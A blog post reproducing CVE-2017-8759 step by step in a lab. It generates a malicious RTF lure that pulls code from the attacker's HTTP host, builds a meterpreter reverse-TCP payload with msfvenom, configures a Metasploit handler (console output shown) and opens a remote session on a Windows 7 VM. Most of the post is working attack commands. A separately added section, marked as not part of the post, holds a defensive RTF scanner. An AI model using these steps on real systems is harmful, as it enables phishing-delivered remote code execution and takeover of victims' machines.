CVE-2017-8759 Vulnerability Reproduction

Vulnerability write-up: http://www.freebuf.com/articles/system/147602.html

PoC repository: https://github.com/bhdresh/CVE-2017-8759

Kali 2.0 was too sluggish, so I dropped it; I am currently using Parrot.

First, clone the PoC to the local machine:

git clone https://github.com/bhdresh/CVE-2017-8759


Change into the CVE-2017-8759 directory and open README.md to see how the toolkit is used:

sudo pluma README.md


###### Example commands
	1) Generate malicious RTF file
	   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
	2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
	   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
	   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
	3) Start toolkit in exploit mode to deliver local payload
	   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

First, generate the malicious RTF file with the following command (run ifconfig first to check your own IP and replace the IP in the command with it; mine is 192.168.0.124):

python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.0.124/test.txt


The file is generated successfully; run ls to confirm it exists.


Step two: generate the payload with msf.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your listening port> -f exe > /tmp/shell.exe


Then start msf with msfconsole; this takes a little while.

Once it is up, configure msf:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload set payload windows/meterpreter/reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set lhost 192.168.0.124
lhost => 192.168.0.124
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.124    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.124:4444


The listener is up; now the final step:

python cve-2017-8759_toolkit.py -M exp -e http://192.168.0.124/shell.exe -l /tmp/shell.exe


Drag the RTF file into the Win7 virtual machine and open it.


The callback comes in, but msf on this system seems to have a problem and hangs there.


Press Ctrl+C to stop, then run session -l to list the sessions.

Use session -i to select a session.


Success. As for what to do next, I am sure you all know better than I do.

Having a PoC is just great.
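As an added example (not part of this post and not code from the bhdresh toolkit), here is a small defender-side scanner for the kind of RTF lure generated above: it decodes the hex of every \objdata OLE payload in an RTF file and reports any embedded URL, flagging those preceded by the soap:wsdl= moniker prefix that public CVE-2017-8759 write-ups describe (that indicator is an assumption taken from those write-ups, not from this post). The sample RTF is constructed inline.

```python
import re
import sys

# "soap:wsdl=" is the publicly documented URL-moniker prefix used by CVE-2017-8759
# lures; this indicator comes from public write-ups, not from this post (assumption).
SOAP_MONIKER = b"soap:wsdl="
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")

def objdata_blobs(rtf: bytes):
    """Decode the hex payload of every \\objdata group in an RTF byte string."""
    blobs = []
    for m in re.finditer(rb"\\objdata\b", rtf):
        depth, i = 1, m.end()
        while i < len(rtf) and depth:
            depth += {0x7B: 1, 0x7D: -1}.get(rtf[i], 0)   # '{' opens, '}' closes a group
            i += 1
        body = rtf[m.end(): i - 1 if depth == 0 else i]
        body = re.sub(rb"\\[a-zA-Z]+-?\d* ?", b"", body)  # drop nested control words
        hexstr = re.sub(rb"[^0-9a-fA-F]", b"", body)      # keep only hex digits
        blobs.append(bytes.fromhex(hexstr[: len(hexstr) & ~1].decode()))
    return blobs

def scan_rtf(rtf: bytes):
    """Return (blob_index, url, is_soap_moniker) for each URL inside an OLE object payload."""
    findings = []
    for n, blob in enumerate(objdata_blobs(rtf)):
        # Check the raw bytes and a NUL-stripped view so UTF-16LE strings are caught too.
        for view in (blob, blob.replace(b"\x00", b"")):
            for m in URL_RE.finditer(view):
                before = view[max(0, m.start() - len(SOAP_MONIKER)): m.start()]
                entry = (n, m.group().decode("ascii", "replace"), before == SOAP_MONIKER)
                if entry not in findings:
                    findings.append(entry)
    return findings

# Constructed sample (not a real lure): an RTF whose embedded object carries the moniker string.
_payload = b"\x01\x05\x00\x00\x02\x00\x00\x00" + SOAP_MONIKER + b"http://192.168.0.124/test.txt\x00"
SAMPLE_RTF = b"{\\rtf1{\\object\\objautlink{\\*\\objdata " + _payload.hex().encode() + b"}}}"
# Constructed benign sample: an object payload with no URL at all.
CLEAN_RTF = b"{\\rtf1 plain text {\\*\\objdata 0105000002000000}}"

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_RTF
    for blob_idx, url, soap in scan_rtf(data):
        print(f"objdata #{blob_idx}: {url}  soap-moniker={soap}")
```

Run it with a path to an RTF file to scan that file; with no argument it scans the constructed sample.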


Author: iceH
Link: http://www.secice.cn/p/c1a00b05
License: unless otherwise stated, all articles on this blog are released under the CC BY-SA 4.0 license; please credit the source when reposting.